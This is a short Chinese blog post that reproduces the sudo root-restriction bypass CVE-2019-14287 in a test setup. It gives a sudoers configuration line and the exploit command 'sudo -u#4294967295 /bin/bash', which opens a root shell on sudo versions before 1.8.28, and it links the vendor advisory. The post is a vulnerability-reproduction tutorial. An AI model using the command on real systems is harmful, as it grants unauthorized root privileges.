(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

1:查看测试机sudo版本号,确认是受影响版本。

2:创建账号test

3:进入/etc,备份一下sudoers到/root,然后修改sudoers内容,添加:

test  ALL=(ALL,!root) /bin/bash

4:登录test账号,

 

 sudo -u#4294967295 /bin/bash

 

 

受影响的Sudo版本:

1.8.28之前的Sudo版本会受到影响。

=======================================
参考链接:
https://www.sudo.ws/alerts/minus_1_uid.html
https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
https://mp.weixin.qq.com/s/1-WQSiB1Yc_sPYh928TXkw

posted @ 2019-10-15 18:02  SSSZZZ  阅读(372)  评论(0)    收藏  举报